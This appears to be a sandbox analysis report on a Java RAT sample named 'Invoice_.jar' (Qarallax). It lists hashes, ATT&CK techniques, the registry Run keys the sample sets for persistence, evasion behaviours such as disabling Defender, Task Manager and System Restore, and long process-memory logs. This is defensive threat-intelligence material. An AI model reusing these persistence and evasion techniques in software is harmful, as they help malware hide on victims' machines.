qarallax | bd0689a49b290187170ebe5ad6d582d18b7d13681b28e951f04172d79265d0fa

Analysis

max time kernel
149s
max time network
153s
platform
windows10_x64
resource
win10v200722
submitted
23/09/2020, 10:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Invoice_.jar
Size

403KB
MD5

cf937e091a57e2a92baf1b8e635a0595
SHA1

1eab495dce63c73a138ed476f7309ef0e6bc1361
SHA256

bd0689a49b290187170ebe5ad6d582d18b7d13681b28e951f04172d79265d0fa
SHA512

bdc6f86f2bdc56ddf969ac8c7690bc305c034aaa3aaf6bde82400dea5ac5d47f54179a0d7ef5fbe1399b4aefe125b5ffd99f26bc966c313aad944918c9056892

Score

10^/10

persistence evasion trojan qarallax

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae2b-58.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
512	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\EXppBZk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\bTTIR\\SOAqQ.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\EXppBZk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\bTTIR\\SOAqQ.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\bTTIR\Desktop.ini	java.exe
File created	C:\Users\Admin\bTTIR\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\bTTIR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\bTTIR\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\xJNNg	java.exe
File opened for modification	C:\Windows\System32\xJNNg	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
4464	taskkill.exe
4688	taskkill.exe
4804	taskkill.exe
4248	taskkill.exe
3944	taskkill.exe
3936	taskkill.exe
4496	taskkill.exe
3864	taskkill.exe
4616	taskkill.exe
4876	taskkill.exe
1284	taskkill.exe
4356	taskkill.exe
4888	taskkill.exe
1912	taskkill.exe
4024	taskkill.exe
2920	taskkill.exe
856	taskkill.exe
3240	taskkill.exe
5084	taskkill.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3228	powershell.exe
3228	powershell.exe
3228	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
512	java.exe

Suspicious use of AdjustPrivilegeToken 125 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4028	WMIC.exe
Token: SeSecurityPrivilege	4028	WMIC.exe
Token: SeTakeOwnershipPrivilege	4028	WMIC.exe
Token: SeLoadDriverPrivilege	4028	WMIC.exe
Token: SeSystemProfilePrivilege	4028	WMIC.exe
Token: SeSystemtimePrivilege	4028	WMIC.exe
Token: SeProfSingleProcessPrivilege	4028	WMIC.exe
Token: SeIncBasePriorityPrivilege	4028	WMIC.exe
Token: SeCreatePagefilePrivilege	4028	WMIC.exe
Token: SeBackupPrivilege	4028	WMIC.exe
Token: SeRestorePrivilege	4028	WMIC.exe
Token: SeShutdownPrivilege	4028	WMIC.exe
Token: SeDebugPrivilege	4028	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4028	WMIC.exe
Token: SeRemoteShutdownPrivilege	4028	WMIC.exe
Token: SeUndockPrivilege	4028	WMIC.exe
Token: SeManageVolumePrivilege	4028	WMIC.exe
Token: 33	4028	WMIC.exe
Token: 34	4028	WMIC.exe
Token: 35	4028	WMIC.exe
Token: 36	4028	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4028	WMIC.exe
Token: SeSecurityPrivilege	4028	WMIC.exe
Token: SeTakeOwnershipPrivilege	4028	WMIC.exe
Token: SeLoadDriverPrivilege	4028	WMIC.exe
Token: SeSystemProfilePrivilege	4028	WMIC.exe
Token: SeSystemtimePrivilege	4028	WMIC.exe
Token: SeProfSingleProcessPrivilege	4028	WMIC.exe
Token: SeIncBasePriorityPrivilege	4028	WMIC.exe
Token: SeCreatePagefilePrivilege	4028	WMIC.exe
Token: SeBackupPrivilege	4028	WMIC.exe
Token: SeRestorePrivilege	4028	WMIC.exe
Token: SeShutdownPrivilege	4028	WMIC.exe
Token: SeDebugPrivilege	4028	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4028	WMIC.exe
Token: SeRemoteShutdownPrivilege	4028	WMIC.exe
Token: SeUndockPrivilege	4028	WMIC.exe
Token: SeManageVolumePrivilege	4028	WMIC.exe
Token: 33	4028	WMIC.exe
Token: 34	4028	WMIC.exe
Token: 35	4028	WMIC.exe
Token: 36	4028	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1284	WMIC.exe
Token: SeSecurityPrivilege	1284	WMIC.exe
Token: SeTakeOwnershipPrivilege	1284	WMIC.exe
Token: SeLoadDriverPrivilege	1284	WMIC.exe
Token: SeSystemProfilePrivilege	1284	WMIC.exe
Token: SeSystemtimePrivilege	1284	WMIC.exe
Token: SeProfSingleProcessPrivilege	1284	WMIC.exe
Token: SeIncBasePriorityPrivilege	1284	WMIC.exe
Token: SeCreatePagefilePrivilege	1284	WMIC.exe
Token: SeBackupPrivilege	1284	WMIC.exe
Token: SeRestorePrivilege	1284	WMIC.exe
Token: SeShutdownPrivilege	1284	WMIC.exe
Token: SeDebugPrivilege	1284	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1284	WMIC.exe
Token: SeRemoteShutdownPrivilege	1284	WMIC.exe
Token: SeUndockPrivilege	1284	WMIC.exe
Token: SeManageVolumePrivilege	1284	WMIC.exe
Token: 33	1284	WMIC.exe
Token: 34	1284	WMIC.exe
Token: 35	1284	WMIC.exe
Token: 36	1284	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1284	WMIC.exe
Token: SeSecurityPrivilege	1284	WMIC.exe
Token: SeTakeOwnershipPrivilege	1284	WMIC.exe
Token: SeLoadDriverPrivilege	1284	WMIC.exe
Token: SeSystemProfilePrivilege	1284	WMIC.exe
Token: SeSystemtimePrivilege	1284	WMIC.exe
Token: SeProfSingleProcessPrivilege	1284	WMIC.exe
Token: SeIncBasePriorityPrivilege	1284	WMIC.exe
Token: SeCreatePagefilePrivilege	1284	WMIC.exe
Token: SeBackupPrivilege	1284	WMIC.exe
Token: SeRestorePrivilege	1284	WMIC.exe
Token: SeShutdownPrivilege	1284	WMIC.exe
Token: SeDebugPrivilege	1284	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1284	WMIC.exe
Token: SeRemoteShutdownPrivilege	1284	WMIC.exe
Token: SeUndockPrivilege	1284	WMIC.exe
Token: SeManageVolumePrivilege	1284	WMIC.exe
Token: 33	1284	WMIC.exe
Token: 34	1284	WMIC.exe
Token: 35	1284	WMIC.exe
Token: 36	1284	WMIC.exe
Token: SeDebugPrivilege	1912	taskkill.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	4024	taskkill.exe
Token: SeDebugPrivilege	3864	taskkill.exe
Token: SeDebugPrivilege	4464	taskkill.exe
Token: SeDebugPrivilege	4688	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3228	powershell.exe
Token: SeSecurityPrivilege	3228	powershell.exe
Token: SeTakeOwnershipPrivilege	3228	powershell.exe
Token: SeLoadDriverPrivilege	3228	powershell.exe
Token: SeSystemProfilePrivilege	3228	powershell.exe
Token: SeSystemtimePrivilege	3228	powershell.exe
Token: SeProfSingleProcessPrivilege	3228	powershell.exe
Token: SeIncBasePriorityPrivilege	3228	powershell.exe
Token: SeCreatePagefilePrivilege	3228	powershell.exe
Token: SeBackupPrivilege	3228	powershell.exe
Token: SeRestorePrivilege	3228	powershell.exe
Token: SeShutdownPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeSystemEnvironmentPrivilege	3228	powershell.exe
Token: SeRemoteShutdownPrivilege	3228	powershell.exe
Token: SeUndockPrivilege	3228	powershell.exe
Token: SeManageVolumePrivilege	3228	powershell.exe
Token: 33	3228	powershell.exe
Token: 34	3228	powershell.exe
Token: 35	3228	powershell.exe
Token: 36	3228	powershell.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeDebugPrivilege	4616	taskkill.exe
Token: SeDebugPrivilege	3944	taskkill.exe
Token: SeDebugPrivilege	4876	taskkill.exe
Token: SeDebugPrivilege	3936	taskkill.exe
Token: SeDebugPrivilege	856	taskkill.exe
Token: SeDebugPrivilege	4496	taskkill.exe
Token: SeDebugPrivilege	3240	taskkill.exe
Token: SeDebugPrivilege	4804	taskkill.exe
Token: SeDebugPrivilege	1284	taskkill.exe
Token: SeDebugPrivilege	5084	taskkill.exe
Token: SeDebugPrivilege	4248	taskkill.exe
Token: SeDebugPrivilege	4356	taskkill.exe
Token: SeDebugPrivilege	4888	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
512	java.exe

Suspicious use of WriteProcessMemory 412 IoCs

description	pid	Process	procid_target
PID 512 wrote to memory of 2876	512	java.exe	77
PID 512 wrote to memory of 2876	512	java.exe	77
PID 512 wrote to memory of 1456	512	java.exe	79
PID 512 wrote to memory of 1456	512	java.exe	79
PID 1456 wrote to memory of 4028	1456	cmd.exe	81
PID 1456 wrote to memory of 4028	1456	cmd.exe	81
PID 512 wrote to memory of 3372	512	java.exe	82
PID 512 wrote to memory of 3372	512	java.exe	82
PID 3372 wrote to memory of 1284	3372	cmd.exe	84
PID 3372 wrote to memory of 1284	3372	cmd.exe	84
PID 512 wrote to memory of 1668	512	java.exe	85
PID 512 wrote to memory of 1668	512	java.exe	85
PID 512 wrote to memory of 3948	512	java.exe	87
PID 512 wrote to memory of 3948	512	java.exe	87
PID 512 wrote to memory of 2276	512	java.exe	89
PID 512 wrote to memory of 2276	512	java.exe	89
PID 512 wrote to memory of 3864	512	java.exe	91
PID 512 wrote to memory of 3864	512	java.exe	91
PID 512 wrote to memory of 3852	512	java.exe	92
PID 512 wrote to memory of 3852	512	java.exe	92
PID 512 wrote to memory of 720	512	java.exe	94
PID 512 wrote to memory of 720	512	java.exe	94
PID 512 wrote to memory of 3096	512	java.exe	96
PID 512 wrote to memory of 3096	512	java.exe	96
PID 512 wrote to memory of 1732	512	java.exe	98
PID 512 wrote to memory of 1732	512	java.exe	98
PID 512 wrote to memory of 2488	512	java.exe	101
PID 512 wrote to memory of 2488	512	java.exe	101
PID 512 wrote to memory of 3228	512	java.exe	103
PID 512 wrote to memory of 3228	512	java.exe	103
PID 512 wrote to memory of 1912	512	java.exe	104
PID 512 wrote to memory of 1912	512	java.exe	104
PID 512 wrote to memory of 1260	512	java.exe	106
PID 512 wrote to memory of 1260	512	java.exe	106
PID 512 wrote to memory of 4008	512	java.exe	107
PID 512 wrote to memory of 4008	512	java.exe	107
PID 512 wrote to memory of 1284	512	java.exe	110
PID 512 wrote to memory of 1284	512	java.exe	110
PID 512 wrote to memory of 1000	512	java.exe	111
PID 512 wrote to memory of 1000	512	java.exe	111
PID 512 wrote to memory of 3960	512	java.exe	115
PID 512 wrote to memory of 3960	512	java.exe	115
PID 512 wrote to memory of 1080	512	java.exe	116
PID 512 wrote to memory of 1080	512	java.exe	116
PID 512 wrote to memory of 3092	512	java.exe	119
PID 512 wrote to memory of 3092	512	java.exe	119
PID 512 wrote to memory of 3804	512	java.exe	120
PID 512 wrote to memory of 3804	512	java.exe	120
PID 512 wrote to memory of 836	512	java.exe	123
PID 512 wrote to memory of 836	512	java.exe	123
PID 512 wrote to memory of 4028	512	java.exe	124
PID 512 wrote to memory of 4028	512	java.exe	124
PID 512 wrote to memory of 188	512	java.exe	127
PID 512 wrote to memory of 188	512	java.exe	127
PID 512 wrote to memory of 1436	512	java.exe	128
PID 512 wrote to memory of 1436	512	java.exe	128
PID 2488 wrote to memory of 1260	2488	cmd.exe	130
PID 2488 wrote to memory of 1260	2488	cmd.exe	130
PID 512 wrote to memory of 3812	512	java.exe	133
PID 512 wrote to memory of 2072	512	java.exe	132
PID 512 wrote to memory of 3812	512	java.exe	133
PID 512 wrote to memory of 2072	512	java.exe	132
PID 512 wrote to memory of 4024	512	java.exe	135
PID 512 wrote to memory of 4024	512	java.exe	135
PID 512 wrote to memory of 352	512	java.exe	137
PID 512 wrote to memory of 352	512	java.exe	137
PID 512 wrote to memory of 3488	512	java.exe	138
PID 512 wrote to memory of 3488	512	java.exe	138
PID 512 wrote to memory of 1504	512	java.exe	142
PID 512 wrote to memory of 1504	512	java.exe	142
PID 512 wrote to memory of 1792	512	java.exe	143
PID 512 wrote to memory of 1792	512	java.exe	143
PID 512 wrote to memory of 780	512	java.exe	147
PID 512 wrote to memory of 780	512	java.exe	147
PID 512 wrote to memory of 3152	512	java.exe	148
PID 512 wrote to memory of 3152	512	java.exe	148
PID 512 wrote to memory of 3568	512	java.exe	151
PID 512 wrote to memory of 3568	512	java.exe	151
PID 512 wrote to memory of 992	512	java.exe	152
PID 512 wrote to memory of 992	512	java.exe	152
PID 512 wrote to memory of 3784	512	java.exe	155
PID 512 wrote to memory of 3784	512	java.exe	155
PID 512 wrote to memory of 2104	512	java.exe	156
PID 512 wrote to memory of 2104	512	java.exe	156
PID 2488 wrote to memory of 2148	2488	cmd.exe	157
PID 2488 wrote to memory of 2148	2488	cmd.exe	157
PID 512 wrote to memory of 1560	512	java.exe	160
PID 512 wrote to memory of 1560	512	java.exe	160
PID 512 wrote to memory of 4016	512	java.exe	161
PID 512 wrote to memory of 4016	512	java.exe	161
PID 512 wrote to memory of 3864	512	java.exe	162
PID 512 wrote to memory of 3864	512	java.exe	162
PID 512 wrote to memory of 2436	512	java.exe	165
PID 512 wrote to memory of 2436	512	java.exe	165
PID 512 wrote to memory of 1672	512	java.exe	168
PID 512 wrote to memory of 1672	512	java.exe	168
PID 512 wrote to memory of 1260	512	java.exe	170
PID 512 wrote to memory of 1260	512	java.exe	170
PID 512 wrote to memory of 4152	512	java.exe	172
PID 512 wrote to memory of 4152	512	java.exe	172
PID 512 wrote to memory of 4224	512	java.exe	174
PID 512 wrote to memory of 4224	512	java.exe	174
PID 512 wrote to memory of 4292	512	java.exe	176
PID 512 wrote to memory of 4292	512	java.exe	176
PID 512 wrote to memory of 4328	512	java.exe	178
PID 512 wrote to memory of 4328	512	java.exe	178
PID 4328 wrote to memory of 4428	4328	cmd.exe	180
PID 4328 wrote to memory of 4428	4328	cmd.exe	180
PID 4328 wrote to memory of 4452	4328	cmd.exe	181
PID 4328 wrote to memory of 4452	4328	cmd.exe	181
PID 512 wrote to memory of 4464	512	java.exe	182
PID 512 wrote to memory of 4464	512	java.exe	182
PID 512 wrote to memory of 4512	512	java.exe	184
PID 512 wrote to memory of 4512	512	java.exe	184
PID 4512 wrote to memory of 4568	4512	cmd.exe	186
PID 4512 wrote to memory of 4568	4512	cmd.exe	186
PID 4512 wrote to memory of 4588	4512	cmd.exe	187
PID 4512 wrote to memory of 4588	4512	cmd.exe	187
PID 512 wrote to memory of 4608	512	java.exe	188
PID 512 wrote to memory of 4608	512	java.exe	188
PID 4608 wrote to memory of 4648	4608	cmd.exe	190
PID 4608 wrote to memory of 4648	4608	cmd.exe	190
PID 4608 wrote to memory of 4668	4608	cmd.exe	191
PID 4608 wrote to memory of 4668	4608	cmd.exe	191
PID 512 wrote to memory of 4688	512	java.exe	192
PID 512 wrote to memory of 4688	512	java.exe	192
PID 512 wrote to memory of 4700	512	java.exe	193
PID 512 wrote to memory of 4700	512	java.exe	193
PID 4700 wrote to memory of 4772	4700	cmd.exe	196
PID 4700 wrote to memory of 4772	4700	cmd.exe	196
PID 4700 wrote to memory of 4796	4700	cmd.exe	197
PID 4700 wrote to memory of 4796	4700	cmd.exe	197
PID 512 wrote to memory of 4824	512	java.exe	198
PID 512 wrote to memory of 4824	512	java.exe	198
PID 4824 wrote to memory of 4860	4824	cmd.exe	200
PID 4824 wrote to memory of 4860	4824	cmd.exe	200
PID 4824 wrote to memory of 4880	4824	cmd.exe	201
PID 4824 wrote to memory of 4880	4824	cmd.exe	201
PID 512 wrote to memory of 4900	512	java.exe	202
PID 512 wrote to memory of 4900	512	java.exe	202
PID 4900 wrote to memory of 4936	4900	cmd.exe	204
PID 4900 wrote to memory of 4936	4900	cmd.exe	204
PID 4900 wrote to memory of 4956	4900	cmd.exe	205
PID 4900 wrote to memory of 4956	4900	cmd.exe	205
PID 512 wrote to memory of 4980	512	java.exe	206
PID 512 wrote to memory of 4980	512	java.exe	206
PID 4980 wrote to memory of 5016	4980	cmd.exe	208
PID 4980 wrote to memory of 5016	4980	cmd.exe	208
PID 4980 wrote to memory of 5036	4980	cmd.exe	209
PID 4980 wrote to memory of 5036	4980	cmd.exe	209
PID 512 wrote to memory of 5056	512	java.exe	210
PID 512 wrote to memory of 5056	512	java.exe	210
PID 5056 wrote to memory of 500	5056	cmd.exe	213
PID 5056 wrote to memory of 500	5056	cmd.exe	213
PID 5056 wrote to memory of 1468	5056	cmd.exe	214
PID 5056 wrote to memory of 1468	5056	cmd.exe	214
PID 512 wrote to memory of 2300	512	java.exe	215
PID 512 wrote to memory of 2300	512	java.exe	215
PID 2300 wrote to memory of 3636	2300	cmd.exe	217
PID 2300 wrote to memory of 3636	2300	cmd.exe	217
PID 2300 wrote to memory of 200	2300	cmd.exe	218
PID 2300 wrote to memory of 200	2300	cmd.exe	218
PID 512 wrote to memory of 836	512	java.exe	219
PID 512 wrote to memory of 836	512	java.exe	219
PID 836 wrote to memory of 3784	836	cmd.exe	221
PID 836 wrote to memory of 3784	836	cmd.exe	221
PID 836 wrote to memory of 2664	836	cmd.exe	222
PID 836 wrote to memory of 2664	836	cmd.exe	222
PID 512 wrote to memory of 1792	512	java.exe	223
PID 512 wrote to memory of 1792	512	java.exe	223
PID 1792 wrote to memory of 1080	1792	cmd.exe	225
PID 1792 wrote to memory of 1080	1792	cmd.exe	225
PID 1792 wrote to memory of 3804	1792	cmd.exe	226
PID 1792 wrote to memory of 3804	1792	cmd.exe	226
PID 512 wrote to memory of 4260	512	java.exe	227
PID 512 wrote to memory of 4260	512	java.exe	227
PID 512 wrote to memory of 2920	512	java.exe	229
PID 512 wrote to memory of 2920	512	java.exe	229
PID 4260 wrote to memory of 4120	4260	cmd.exe	230
PID 4260 wrote to memory of 4120	4260	cmd.exe	230
PID 4260 wrote to memory of 4376	4260	cmd.exe	232
PID 4260 wrote to memory of 4376	4260	cmd.exe	232
PID 512 wrote to memory of 4180	512	java.exe	233
PID 512 wrote to memory of 4180	512	java.exe	233
PID 4180 wrote to memory of 4288	4180	cmd.exe	235
PID 4180 wrote to memory of 4288	4180	cmd.exe	235
PID 4180 wrote to memory of 4364	4180	cmd.exe	236
PID 4180 wrote to memory of 4364	4180	cmd.exe	236
PID 512 wrote to memory of 4412	512	java.exe	237
PID 512 wrote to memory of 4412	512	java.exe	237
PID 4412 wrote to memory of 496	4412	cmd.exe	239
PID 4412 wrote to memory of 496	4412	cmd.exe	239
PID 4412 wrote to memory of 3048	4412	cmd.exe	240
PID 4412 wrote to memory of 3048	4412	cmd.exe	240
PID 512 wrote to memory of 4460	512	java.exe	241
PID 512 wrote to memory of 4460	512	java.exe	241
PID 4460 wrote to memory of 4024	4460	cmd.exe	243
PID 4460 wrote to memory of 4024	4460	cmd.exe	243
PID 4460 wrote to memory of 3032	4460	cmd.exe	244
PID 4460 wrote to memory of 3032	4460	cmd.exe	244
PID 512 wrote to memory of 3984	512	java.exe	245
PID 512 wrote to memory of 3984	512	java.exe	245
PID 3984 wrote to memory of 4264	3984	cmd.exe	247
PID 3984 wrote to memory of 4264	3984	cmd.exe	247
PID 3984 wrote to memory of 4216	3984	cmd.exe	248
PID 3984 wrote to memory of 4216	3984	cmd.exe	248
PID 512 wrote to memory of 3924	512	java.exe	249
PID 512 wrote to memory of 3924	512	java.exe	249
PID 3924 wrote to memory of 4468	3924	cmd.exe	251
PID 3924 wrote to memory of 4468	3924	cmd.exe	251
PID 3924 wrote to memory of 4500	3924	cmd.exe	252
PID 3924 wrote to memory of 4500	3924	cmd.exe	252
PID 512 wrote to memory of 4580	512	java.exe	253
PID 512 wrote to memory of 4580	512	java.exe	253
PID 512 wrote to memory of 4616	512	java.exe	255
PID 512 wrote to memory of 4616	512	java.exe	255
PID 4580 wrote to memory of 4660	4580	cmd.exe	257
PID 4580 wrote to memory of 4660	4580	cmd.exe	257
PID 4580 wrote to memory of 4548	4580	cmd.exe	258
PID 4580 wrote to memory of 4548	4580	cmd.exe	258
PID 512 wrote to memory of 3280	512	java.exe	259
PID 512 wrote to memory of 3280	512	java.exe	259
PID 3280 wrote to memory of 4388	3280	cmd.exe	261
PID 3280 wrote to memory of 4388	3280	cmd.exe	261
PID 3280 wrote to memory of 4372	3280	cmd.exe	262
PID 3280 wrote to memory of 4372	3280	cmd.exe	262
PID 512 wrote to memory of 4776	512	java.exe	263
PID 512 wrote to memory of 4776	512	java.exe	263
PID 4776 wrote to memory of 4816	4776	cmd.exe	265
PID 4776 wrote to memory of 4816	4776	cmd.exe	265
PID 4776 wrote to memory of 4692	4776	cmd.exe	266
PID 4776 wrote to memory of 4692	4776	cmd.exe	266
PID 512 wrote to memory of 4764	512	java.exe	267
PID 512 wrote to memory of 4764	512	java.exe	267
PID 4764 wrote to memory of 4896	4764	cmd.exe	269
PID 4764 wrote to memory of 4896	4764	cmd.exe	269
PID 4764 wrote to memory of 4640	4764	cmd.exe	270
PID 4764 wrote to memory of 4640	4764	cmd.exe	270
PID 512 wrote to memory of 4944	512	java.exe	271
PID 512 wrote to memory of 4944	512	java.exe	271
PID 4944 wrote to memory of 4956	4944	cmd.exe	273
PID 4944 wrote to memory of 4956	4944	cmd.exe	273
PID 4944 wrote to memory of 5028	4944	cmd.exe	274
PID 4944 wrote to memory of 5028	4944	cmd.exe	274
PID 512 wrote to memory of 5052	512	java.exe	275
PID 512 wrote to memory of 5052	512	java.exe	275
PID 5052 wrote to memory of 1284	5052	cmd.exe	277
PID 5052 wrote to memory of 1284	5052	cmd.exe	277
PID 5052 wrote to memory of 1468	5052	cmd.exe	278
PID 5052 wrote to memory of 1468	5052	cmd.exe	278
PID 512 wrote to memory of 3996	512	java.exe	279
PID 512 wrote to memory of 3996	512	java.exe	279
PID 3996 wrote to memory of 4124	3996	cmd.exe	281
PID 3996 wrote to memory of 4124	3996	cmd.exe	281
PID 3996 wrote to memory of 1732	3996	cmd.exe	282
PID 3996 wrote to memory of 1732	3996	cmd.exe	282
PID 512 wrote to memory of 2664	512	java.exe	283
PID 512 wrote to memory of 2664	512	java.exe	283
PID 2664 wrote to memory of 4272	2664	cmd.exe	285
PID 2664 wrote to memory of 4272	2664	cmd.exe	285
PID 2664 wrote to memory of 4200	2664	cmd.exe	286
PID 2664 wrote to memory of 4200	2664	cmd.exe	286
PID 512 wrote to memory of 4132	512	java.exe	287
PID 512 wrote to memory of 4132	512	java.exe	287
PID 4132 wrote to memory of 4368	4132	cmd.exe	289
PID 4132 wrote to memory of 4368	4132	cmd.exe	289
PID 4132 wrote to memory of 2688	4132	cmd.exe	290
PID 4132 wrote to memory of 2688	4132	cmd.exe	290
PID 512 wrote to memory of 3944	512	java.exe	291
PID 512 wrote to memory of 3944	512	java.exe	291
PID 512 wrote to memory of 4300	512	java.exe	293
PID 512 wrote to memory of 4300	512	java.exe	293
PID 4300 wrote to memory of 4224	4300	cmd.exe	295
PID 4300 wrote to memory of 4224	4300	cmd.exe	295
PID 4300 wrote to memory of 4408	4300	cmd.exe	296
PID 4300 wrote to memory of 4408	4300	cmd.exe	296
PID 512 wrote to memory of 2920	512	java.exe	297
PID 512 wrote to memory of 2920	512	java.exe	297
PID 2920 wrote to memory of 4296	2920	cmd.exe	299
PID 2920 wrote to memory of 4296	2920	cmd.exe	299
PID 2920 wrote to memory of 1704	2920	cmd.exe	300
PID 2920 wrote to memory of 1704	2920	cmd.exe	300
PID 512 wrote to memory of 496	512	java.exe	301
PID 512 wrote to memory of 496	512	java.exe	301
PID 496 wrote to memory of 4472	496	cmd.exe	303
PID 496 wrote to memory of 4472	496	cmd.exe	303
PID 496 wrote to memory of 1912	496	cmd.exe	304
PID 496 wrote to memory of 1912	496	cmd.exe	304
PID 512 wrote to memory of 1932	512	java.exe	305
PID 512 wrote to memory of 1932	512	java.exe	305
PID 1932 wrote to memory of 4216	1932	cmd.exe	307
PID 1932 wrote to memory of 4216	1932	cmd.exe	307
PID 1932 wrote to memory of 4532	1932	cmd.exe	308
PID 1932 wrote to memory of 4532	1932	cmd.exe	308
PID 512 wrote to memory of 4508	512	java.exe	309
PID 512 wrote to memory of 4508	512	java.exe	309
PID 4508 wrote to memory of 4680	4508	cmd.exe	311
PID 4508 wrote to memory of 4680	4508	cmd.exe	311
PID 4508 wrote to memory of 4384	4508	cmd.exe	312
PID 4508 wrote to memory of 4384	4508	cmd.exe	312
PID 512 wrote to memory of 1132	512	java.exe	313
PID 512 wrote to memory of 1132	512	java.exe	313
PID 1132 wrote to memory of 4664	1132	cmd.exe	315
PID 1132 wrote to memory of 4664	1132	cmd.exe	315
PID 1132 wrote to memory of 3628	1132	cmd.exe	316
PID 1132 wrote to memory of 3628	1132	cmd.exe	316
PID 512 wrote to memory of 4372	512	java.exe	317
PID 512 wrote to memory of 4372	512	java.exe	317
PID 4372 wrote to memory of 4808	4372	cmd.exe	319
PID 4372 wrote to memory of 4808	4372	cmd.exe	319
PID 512 wrote to memory of 4876	512	java.exe	320
PID 512 wrote to memory of 4876	512	java.exe	320
PID 4372 wrote to memory of 4896	4372	cmd.exe	322
PID 4372 wrote to memory of 4896	4372	cmd.exe	322
PID 512 wrote to memory of 4988	512	java.exe	323
PID 512 wrote to memory of 4988	512	java.exe	323
PID 4988 wrote to memory of 3680	4988	cmd.exe	325
PID 4988 wrote to memory of 3680	4988	cmd.exe	325
PID 4988 wrote to memory of 3412	4988	cmd.exe	326
PID 4988 wrote to memory of 3412	4988	cmd.exe	326
PID 512 wrote to memory of 4196	512	java.exe	327
PID 512 wrote to memory of 4196	512	java.exe	327
PID 4196 wrote to memory of 1732	4196	cmd.exe	329
PID 4196 wrote to memory of 1732	4196	cmd.exe	329
PID 4196 wrote to memory of 2152	4196	cmd.exe	330
PID 4196 wrote to memory of 2152	4196	cmd.exe	330
PID 512 wrote to memory of 1436	512	java.exe	331
PID 512 wrote to memory of 1436	512	java.exe	331
PID 1436 wrote to memory of 3064	1436	cmd.exe	333
PID 1436 wrote to memory of 3064	1436	cmd.exe	333
PID 1436 wrote to memory of 3852	1436	cmd.exe	334
PID 1436 wrote to memory of 3852	1436	cmd.exe	334
PID 512 wrote to memory of 4228	512	java.exe	335
PID 512 wrote to memory of 4228	512	java.exe	335
PID 4228 wrote to memory of 4008	4228	cmd.exe	337
PID 4228 wrote to memory of 4008	4228	cmd.exe	337
PID 4228 wrote to memory of 4972	4228	cmd.exe	338
PID 4228 wrote to memory of 4972	4228	cmd.exe	338
PID 512 wrote to memory of 3584	512	java.exe	339
PID 512 wrote to memory of 3584	512	java.exe	339
PID 3584 wrote to memory of 1504	3584	cmd.exe	341
PID 3584 wrote to memory of 1504	3584	cmd.exe	341
PID 3584 wrote to memory of 4840	3584	cmd.exe	342
PID 3584 wrote to memory of 4840	3584	cmd.exe	342
PID 512 wrote to memory of 4204	512	java.exe	343
PID 512 wrote to memory of 4204	512	java.exe	343
PID 4204 wrote to memory of 3496	4204	cmd.exe	345
PID 4204 wrote to memory of 3496	4204	cmd.exe	345
PID 4204 wrote to memory of 4276	4204	cmd.exe	346
PID 4204 wrote to memory of 4276	4204	cmd.exe	346
PID 512 wrote to memory of 2436	512	java.exe	347
PID 512 wrote to memory of 2436	512	java.exe	347
PID 2436 wrote to memory of 3808	2436	cmd.exe	349
PID 2436 wrote to memory of 3808	2436	cmd.exe	349
PID 2436 wrote to memory of 5012	2436	cmd.exe	350
PID 2436 wrote to memory of 5012	2436	cmd.exe	350
PID 512 wrote to memory of 4704	512	java.exe	351
PID 512 wrote to memory of 4704	512	java.exe	351
PID 4704 wrote to memory of 5052	4704	cmd.exe	353
PID 4704 wrote to memory of 5052	4704	cmd.exe	353
PID 4704 wrote to memory of 4776	4704	cmd.exe	354
PID 4704 wrote to memory of 4776	4704	cmd.exe	354
PID 512 wrote to memory of 3280	512	java.exe	355
PID 512 wrote to memory of 3280	512	java.exe	355
PID 3280 wrote to memory of 3112	3280	cmd.exe	357
PID 3280 wrote to memory of 3112	3280	cmd.exe	357
PID 3280 wrote to memory of 4292	3280	cmd.exe	358
PID 3280 wrote to memory of 4292	3280	cmd.exe	358
PID 512 wrote to memory of 4560	512	java.exe	359
